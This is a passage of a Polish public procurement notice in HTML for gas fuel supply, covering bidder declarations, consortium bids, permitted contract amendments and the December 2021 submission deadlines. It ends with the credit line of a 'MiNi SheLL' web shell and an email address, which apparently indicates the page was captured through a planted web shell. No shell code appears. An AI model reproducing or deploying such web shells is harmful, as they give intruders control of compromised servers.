ofertowy) wykonawca składa:<br/>9.6.1. oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków w postępowaniu w<br/>zakresie wskazanym w Rozdziale 6 i 7 SWZ – wg wzoru stanowiącego załącznik nr 4 do SWZ,<br/>9.6.2. pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów rejestrowych. Warunek ten dotyczy również<br/>odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej treści<br/>jednoznacznie wskazywać uprawnienie do podpisania oferty. Umocowanie wymagane jest na<br/>każdym etapie prowadzonego postępowania,<br/>9.6.3. oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia - wg wzoru stanowiącego załącznik nr 5 do<br/>SWZ (jeżeli dotyczy),<br/>9.6.4. zastrzeżenie tajemnicy przedsiębiorstwa – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>8.1.1. nie podlegają wykluczeniu,<br/>8.1.2. spełniają warunki udziału w postępowaniu, określone przez zamawiającego.<br/>8.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum<br/>wykonawców, spółki cywilne).Zamawiający nie wymaga od wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty.<br/>8.3. W przypadku, o którym mowa w pkt 8.2. wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja<br/>prowadzona będzie wyłącznie z Pełnomocnikiem ze skutkiem dla wszystkich wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>8.4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają dostawy, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie z którego wynika, które dostawy wykonają poszczególni wykonawcy<br/>(oświadczenie wg wzoru stanowiącego załącznik nr 5 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z treścią art. 455 ust. 1 pkt 1) i ust. 2 ustawy Pzp Zamawiający dopuszcza<br/>wprowadzenie zmian postanowień Umowy w stosunku do treści oferty, w zakresie:<br/>1.1. zmiany ceny jednostkowej netto za paliwo gazowe wyłącznie w przypadku ustawowej<br/>zmiany opodatkowania gazu podatkiem akcyzowym, o kwotę wynikającą ze zmiany tej stawki,<br/>1.2. zmiany ceny jednostkowej za paliwo gazowe brutto, stawki abonamentowej brutto oraz<br/>stawek dystrybucyjnych brutto wynikającej z ustawowej zmiany stawki podatku VAT, o kwotę<br/>wynikającą ze zmiany tej stawki,<br/>1.3. zmiany przepisów prawa energetycznego lub innych obowiązujących w sprzedaży, obrocie i<br/>dystrybucji paliwa gazowego, mających zastosowanie do umowy,<br/>1.4. zaistnienia okoliczności (technicznych, gospodarczych, prawnych itp.), których nie można<br/>było przewidzieć w chwili zawarcia Umowy - zmiany te mogą spowodować zmianę ilości PPG,<br/>grupy taryfowej, wartości zawartej Umowy lub danych nabywcy, odbiorcy, płatnika.<br/>1.5. zmian spowodowanych siłą wyższą uniemożliwiających wykonanie przedmiotu Umowy, przy<br/>czym przez siłę wyższą Strony rozumieją zdarzenie o charakterze przypadkowym lub<br/>naturalnym, ale zawsze o charakterze zewnętrznym w stosunku do człowieka, zdarzenie<br/>niemożliwe (lub prawie niemożliwe) do przewidzenia, zdarzenie, którego skutkom nie można<br/>zapobiec, w szczególności działania sił przyrody (np. powodzie, trzęsienia ziemi, huragany),<br/>zaburzenia życia zbiorowego (działania wojenne, zamieszki wewnętrzne, strajk, epidemie), akty<br/>władzy państwowej (akty władzy ustawodawczej lub administracyjnej, które czynią niemożliwym<br/>wykonanie danego zobowiązania) – zmiany te mogą spowodować zmiany te mogą spowodować<br/>zmianę ilości PPG, grupy taryfowej lub wartości zawartej Umowy,<br/>1.6. zmiany sposobu wykonania Przedmiotu Umowy w przypadku zmiany regulacji prawnych<br/>odnoszących się do praw i obowiązków Stron Umowy, wprowadzonych po zawarciu Umowy,<br/>wywołujących niezbędną potrzebę zmiany sposobu realizacji Umowy, w tym regulacji prawnych,<br/>na podstawie ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z<br/>zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych - zmiany te mogą spowodować zmianę ilości PPG, grupy<br/>taryfowej lub wartości zawartej Umowy,<br/>1.7. Zamawiający dopuszcza zmiany umowy bez przeprowadzenia nowego postępowania o<br/>udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż<br/>10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/>2. Zmiana postanowień Umowy może nastąpić tylko za zgodą obu jej Stron wyrażoną na piśmie,<br/>w formie aneksu do Umowy, sporządzonego przez Zamawiającego, pod rygorem nieważności<br/>takiej zmiany za wyjątkiem zmian wskazanych w ust. 1 pkt 1.1.-1.2., które to zmiany następują<br/>automatycznie z dniem wejścia w życie zmienionych przepisów.<br/>3. Zamawiający dopuszcza zmiany w umowie określone jako nieistotne:<br/>3.1. zmiany miejsca realizacji umowy pod warunkiem, że nowa lokalizacja będzie spełniała<br/>wymagania określone w SWZ,<br/>3.2. zmiany danych teleadresowych stron umowy lub innych danych zawartych w rejestrach<br/>publicznych.<br/>4. O zmianach danych określonych w ust. 3 pkt 3.1.-3.2. powyżej Strony (Odbiorca/Wykonawca)<br/>będą się informować niezwłocznie w formie pisemnej lub elektronicznej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_kolo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com